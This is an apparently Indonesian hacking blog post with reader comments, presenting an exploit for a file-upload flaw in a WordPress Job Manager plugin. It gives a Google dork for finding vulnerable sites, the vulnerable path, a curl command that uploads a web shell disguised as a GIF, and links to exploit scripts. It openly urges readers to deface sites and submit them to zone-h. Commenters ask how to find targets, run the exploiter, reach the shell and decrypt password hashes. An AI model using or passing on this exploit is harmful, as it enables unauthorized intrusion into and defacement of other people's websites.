Tuesday, 6 June 2017

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

21 comments:

Unknown said...

nyari targetnya gimana bang ???

Anonymous said...

inurl:/wp-content/uploads/job-manager-uploads

Unknown said...

ada tutor deface buat yg blm ngerti apa2 gak om?

Arkov said...
This comment has been removed by the author.
Anonymous said...

cek archive aja, di cari"

Unknown said...

bro what tool name used in windows to run php files

Anonymous said...

xampp bro

see tuts: http://www.indoxploit.or.id/2016/07/cara-menjalankan-exploiter-php.html

Unknown said...

bro,kalo password hash nya pula gmana mau dapatkan?

Unknown said...

{"success":false,"data":[{"code":"upload","message":"You must be logged in to upload files using this method."}]}

Padabae | Gudang Aplikasi PHP Contoh Tugas Akhir said...

tOLONG diperjelas lagi step by step urutan yang harus dilakukan. terimakasih.

Padabae | Gudang Aplikasi PHP Contoh Tugas Akhir said...

Saya upload file pakai script php yang ada di bagian step pertma di tutorial ini dan sudah berhasil sampai step muncul {"files":[]}, kemudian langkah apalagi yang harus saya lakukan.
Terimakash

Fr00xys. tryING said...

ke google terus ketik inurl:/wp-content/uploads/job-manager-uploads

Unknown said...

Mas mau nanya, ini bisa di exploit sampe upload shell ga sih ? maaf saya masih newbie banget makanya kurang tau banyak, makasih

./0px said...

thanks selalu om agus,,, maap baru jalan2 di mari lagi :D

Anonymous said...

ga vuln itu gan

Anonymous said...

pake toolsnya aja gan, cuma tinggal masukin url doang sama ganti gambarnya

Anonymous said...

gabisa gan cuma sekedar upload gambar aja

Anonymous said...

jangan bosen bosen gan

Unknown said...

Cara manngil shell nya gmna bang?

Anonymous said...

pake ini https://www.indoxploit.or.id/2017/03/wordpress-hash-decrypter-tools.html

Anonymous said...

gabisa upload shell

Post a Comment